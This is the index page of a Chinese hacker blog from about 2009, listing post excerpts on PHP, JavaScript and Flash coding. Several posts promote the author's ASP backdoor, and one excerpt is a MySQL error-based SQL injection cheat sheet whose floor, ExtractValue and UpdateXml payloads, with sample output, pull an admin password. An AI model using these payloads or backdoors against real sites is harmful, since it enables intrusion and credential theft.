导航

心动吧黑客BLOG

自发研究:须要多维思想而且要想不可能为可能的人才能做到

[置顶] [原创]心动吧数据库防下载小工具

 这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。

例图:

[置顶] 心动吧警告:除20080508外并未发布其他版本

 先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。

[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆

心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门

 此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式

用了很长时间的这个拦截广告的软件,给朋友们介绍一下

心动吧明生KISS  ps:相信有不少人都会被网站的广告弹得体无完肤吧。。但是以后有了这款软件。确实方便得多了。而且还可以限制一些优酷的广告(装另外的软件),下面就分享分享他吧

 

第一步肯定是去官网下一个这样的插入 

推荐网:http://adblockie.codeplex.com/

华军下载:http://www.onlinedown.net/soft/78355.htm

下载回来安装总会吧。不用教了。。。。

AS:Flash AS3中获取浏览器信息及URL相关参数(并非swf url地址)

  心动吧明生KISS注:最近在写一款关于FLASH插马和FLASH XSS的文章。看到这个文章确实不错。先收藏。。

好久没来这里了,最近发现网络上对此类信息的封装少的可怜,没有一个是比较完整的,今天又是周未,不敲点代码手痒痒的,^_^,所以本人手贱借此时发布一篇是关于 AS3中获取浏览器信息及URL相关参数的WebUtils类,欢迎大家拍砖以使此类更丰富一些!

先来看看效果,因本机没装多个浏览器测试,所以只截了几个浏览器的获取的结果

IE:

360,内核是IE核心,所以效果跟IE基本一样

总收集:mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

 明生注:如果经常安检某个站点。肯定会遇到报错的,所以收集一些关于报错注入的文章,也促进学习

 

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
首先进行正常查询:

mysql> select * from article where id = 1;
+—-+——-+———+
| id | title | content |
+—-+——-+———+
|  1 | test  | do it   |
+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union select null union select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

效果很好,转个微软IE本地文件探测漏洞

心动吧明生KISS注:刚刚在wooyun.org网站看到了一条这样的信息,感觉十分有用.所以先保存下来先.因为最近在做市场调查.感觉这样的方法可以很容易检测到一些默认的软件是否被启动了..以后找个时间测试一下

 

简要描述:

微软ie在处理对本地文件请求时存在一些问题,可以用来探测本地文件是否存在,忽忽

详细说明:

非res协议哦!

Javascript中IFrame父窗口与子窗口相互操作

一、Iframe 篇

//&&&&&&&&&&&&&&&&&&&&公共方法开始&&&&&&&&&&&&&&&

//父对象得到子窗口的值

//ObjectID是窗口标识,ContentID是元素ID

function GetValue(ObjectID,ContentID)

{

var IsIE = (navigator.appName == 'Microsoft Internet Explorer')

if(IsIE)

转:js页面刷新总结

<script>
window.location.reload(true);
</script>
如果是你要刷新某一个iframe就把window给换成frame的名字或ID号
3)
<script>
window.navigate("本页面url");
</script>
4>

.....

php搜索字符串使用与缺点(strpos)

明生注:由于在编写过程中发现strpos的一个挺大的缺点。。所以做一下笔录。。

    首先我们先看看strpos的作用在于对某一个字符串进行判断是否存在某一个单个或多个字符的函数..看事例

$strpos1 = "这是母字符串"; $strpos2 = "母"; if (strpos($str1,$str2)===false)//这里要注意第一个匹配 { //不存在 }else{ //能用ELSE就不用IF //存在 }

上面的事例可以看出来。从“这是母字符串”中搜索是否存在“母”字。而此时因为在第三位出现。所以会返回真

但如果我们将要判断的字符串换成“这”那么此时因为有第1位出现。而php的判断则是为0。所以当我们判断“这”的字符串出现的时候会出现不存在的原因就在这里。

PHP学习笔记2-文件、数组、字符串

明生注:转一文件操作文章。挺好。。

[文件]
 
站点路径
$DOCUMENT_ROOT = $_SERVER[‘DOCUMENT_ROOT’]

...

PHP中文件读写操作

明生KISS注:此文章看着不错所以转来。方便查阅

刚开始学,有点涩,有点不太明白。就以记忆为主。在多加自己操作增加理解,直到有一天融会贯通 。

以下为文件读写操作的 基本PHP函数及模式(看不明白就记住他)

关于模式:

'r' - 只读方式打开, 文件指针置于文件头

'r+' - 读写方式打开,文件指针

.....

PHP 函数Finction与全局变量(第七节)

作者:心动吧明生KISS

我相信所有程序都会有函数的存在。。它的作用是帮助我们将行为或者动作给划分开来。以达到方便管理的作用。如果我们写一大片的程序。无认是读起来还是维护起来都是十分大的工程。如果将他分块而治。这就容易多了。现在我们来试试

函数的使用

<?

 $a = 1; //A的值是1

 $b = 2; //B的值是2



 $J = Jia($a,$b); //使

........

分页:[«]1[2][3][4][5][6][7][8][9][10][11][12][13][14][15][»]

站内搜索

站点统计

  • 文章总数:302
  • 评论总数:54
  • 引用总数:0
  • 浏览总数:39330
  • 留言总数:12
  • 当前主题:WIN经典主题
  • 当前样式:nooker_com_98

图标汇集

  • RainbowSoft Studio Z-Blog
  • 本站支持WAP访问
  • 订阅本站的 RSS 2.0 新闻聚合
  • sitemap.xml
  • 酷站目录

Copyright ⊙ 2004-2009 心动吧 UrL:ABCXD.CoM All RiGhts Reserved